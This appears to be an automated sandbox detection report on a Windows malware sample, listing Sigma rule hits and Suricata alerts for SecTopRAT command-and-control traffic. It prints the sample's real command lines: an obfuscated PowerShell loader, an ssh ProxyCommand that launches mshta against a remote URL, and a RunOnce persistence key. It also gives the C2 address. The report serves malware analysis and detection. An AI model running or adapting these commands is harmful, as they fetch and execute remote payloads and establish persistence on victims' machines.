8D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07D82E69F8043E40065E720A1B159FDD6D422B58B784F

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07D82E69F8043E40065E720A1B159FDD6D422B58B784F

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ahdccea\AutoIt3.exe" C:\ahdccea\bdbhbhc.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\47891652\updater.exe, ProcessId: 3780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\bdbhbhc

Sigma detected: Lolbin Ssh.exe Use As Proxy

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" ., ProcessId: 5896, ProcessName: ssh.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']'), CommandLine: powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 5896, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']'), ProcessId: 4436, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07D82E69F8043E40065E720A1B159FDD6D422B58B784F

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1532, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T08:20:23.443744+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	49716	TCP
2024-12-12T08:21:33.391827+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	49921	TCP
2024-12-12T08:21:51.799165+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	49974	TCP
2024-12-12T08:22:12.602884+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50033	TCP
2024-12-12T08:22:23.572694+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50062	TCP
2024-12-12T08:22:33.272241+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50070	TCP
2024-12-12T08:22:41.675039+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50077	TCP
2024-12-12T08:22:45.677525+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50080	TCP
2024-12-12T08:22:47.877739+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50083	TCP
2024-12-12T08:23:20.486179+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50104	TCP
2024-12-12T08:23:21.814404+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50106	TCP
2024-12-12T08:23:36.812436+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50117	TCP
2024-12-12T08:23:40.412465+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50120	TCP
2024-12-12T08:23:43.276833+0100	2029217	1	Malware Command and Control Activity Detected	185.147.124.236	15647	192.168.2.5	50123	TCP

ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T08:20:22.287570+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:22.407280+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:22.526769+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:22.646730+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:22.769870+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:22.890191+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:23.010223+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:23.130225+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:23.249812+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:23.369263+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:23.443898+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:23.488700+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:23.608645+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:23.729304+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:20:23.848971+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49716	185.147.124.236	15647	TCP
2024-12-12T08:21:32.196570+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49921	185.147.124.236	15647	TCP
2024-12-12T08:21:32.917540+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49921	185.147.124.236	15647	TCP
2024-12-12T08:21:50.608464+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49974	185.147.124.236	15647	TCP
2024-12-12T08:21:50.757192+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49974	185.147.124.236	15647	TCP
2024-12-12T08:21:50.790629+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49974	185.147.124.236	15647	TCP
2024-12-12T08:21:50.801571+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49974	185.147.124.236	15647	TCP
2024-12-12T08:21:51.395021+0100	2051910	1	A Network Trojan was detected	192.168.2.5	49974	185.147.124.236	15647	TCP
2024-12-12T08:22:11.412656+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50033	185.147.124.236	15647	TCP
2024-12-12T08:22:12.032265+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50033	185.147.124.236	15647	TCP
2024-12-12T08:22:22.348384+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50062	185.147.124.236	15647	TCP
2024-12-12T08:22:23.567697+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50062	185.147.124.236	15647	TCP
2024-12-12T08:22:31.886053+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50069	185.147.124.236	15647	TCP
2024-12-12T08:22:32.064179+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50070	185.147.124.236	15647	TCP
2024-12-12T08:22:32.608281+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50070	185.147.124.236	15647	TCP
2024-12-12T08:22:33.069394+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50070	185.147.124.236	15647	TCP
2024-12-12T08:22:33.095885+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50070	185.147.124.236	15647	TCP
2024-12-12T08:22:33.120407+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50070	185.147.124.236	15647	TCP
2024-12-12T08:22:33.145967+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50070	185.147.124.236	15647	TCP
2024-12-12T08:22:33.189049+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50070	185.147.124.236	15647	TCP
2024-12-12T08:22:33.202453+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50070	185.147.124.236	15647	TCP
2024-12-12T08:22:33.215332+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50070	185.147.124.236	15647	TCP
2024-12-12T08:22:40.458723+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50077	185.147.124.236	15647	TCP
2024-12-12T08:22:40.896646+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50077	185.147.124.236	15647	TCP
2024-12-12T08:22:41.504990+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50077	185.147.124.236	15647	TCP
2024-12-12T08:22:44.482588+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50080	185.147.124.236	15647	TCP
2024-12-12T08:22:44.930332+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50080	185.147.124.236	15647	TCP
2024-12-12T08:22:45.328463+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50080	185.147.124.236	15647	TCP
2024-12-12T08:22:45.503998+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50080	185.147.124.236	15647	TCP
2024-12-12T08:22:46.686162+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50083	185.147.124.236	15647	TCP
2024-12-12T08:22:46.892124+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50083	185.147.124.236	15647	TCP
2024-12-12T08:22:47.759639+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50083	185.147.124.236	15647	TCP
2024-12-12T08:23:19.294243+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50104	185.147.124.236	15647	TCP
2024-12-12T08:23:20.131692+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50104	185.147.124.236	15647	TCP
2024-12-12T08:23:20.619445+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50106	185.147.124.236	15647	TCP
2024-12-12T08:23:35.622260+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50117	185.147.124.236	15647	TCP
2024-12-12T08:23:36.436124+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50117	185.147.124.236	15647	TCP
2024-12-12T08:23:39.207633+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50120	185.147.124.236	15647	TCP
2024-12-12T08:23:39.365774+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50120	185.147.124.236	15647	TCP
2024-12-12T08:23:42.086016+0100	2051910	1	A Network Trojan was detected	192.168.2.5	50123	185.147.124.236	15647	TCP

ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T08:20:27.240216+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49729	185.147.124.236	9000	TCP
2024-12-12T08:20:28.783331+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49730	185.147.124.236	9000	TCP
2024-12-12T08:20:30.334565+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49736	185.147.124.236	9000	TCP
2024-12-12T08:20:31.873343+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49742	185.147.124.236	9000	TCP
2024-12-12T08:20:33.406702+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49743	185.147.124.236	9000	TCP
2024-12-12T08:20:34.936302+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49749	185.147.124.236	9000	TCP
2024-12-12T08:20:36.488368+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49755	185.147.124.236	9000	TCP
2024-12-12T08:20:38.063000+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49761	185.147.124.236	9000	TCP
2024-12-12T08:20:39.601047+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49762	185.147.124.236	9000	TCP
2024-12-12T08:20:41.177323+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49768	185.147.124.236	9000	TCP
2024-12-12T08:20:42.718553+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49774	185.147.124.236	9000	TCP
2024-12-12T08:20:44.263331+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49776	185.147.124.236	9000	TCP
2024-12-12T08:20:45.794335+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49781	185.147.124.236	9000	TCP
2024-12-12T08:20:47.326598+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49787	185.147.124.236	9000	TCP
2024-12-12T08:20:49.166329+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49793	185.147.124.236	9000	TCP
2024-12-12T08:20:50.750828+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49794	185.147.124.236	9000	TCP
2024-12-12T08:20:52.284565+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49800	185.147.124.236	9000	TCP
2024-12-12T08:20:53.841484+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49806	185.147.124.236	9000	TCP
2024-12-12T08:20:55.373490+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49812	185.147.124.236	9000	TCP
2024-12-12T08:20:56.921758+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49813	185.147.124.236	9000	TCP
2024-12-12T08:20:58.648113+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49819	185.147.124.236	9000	TCP
2024-12-12T08:21:00.196845+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49825	185.147.124.236	9000	TCP
2024-12-12T08:21:01.738898+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49826	185.147.124.236	9000	TCP
2024-12-12T08:21:03.354854+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49833	185.147.124.236	9000	TCP
2024-12-12T08:21:05.072777+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49839	185.147.124.236	9000	TCP
2024-12-12T08:21:06.637581+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49840	185.147.124.236	9000	TCP
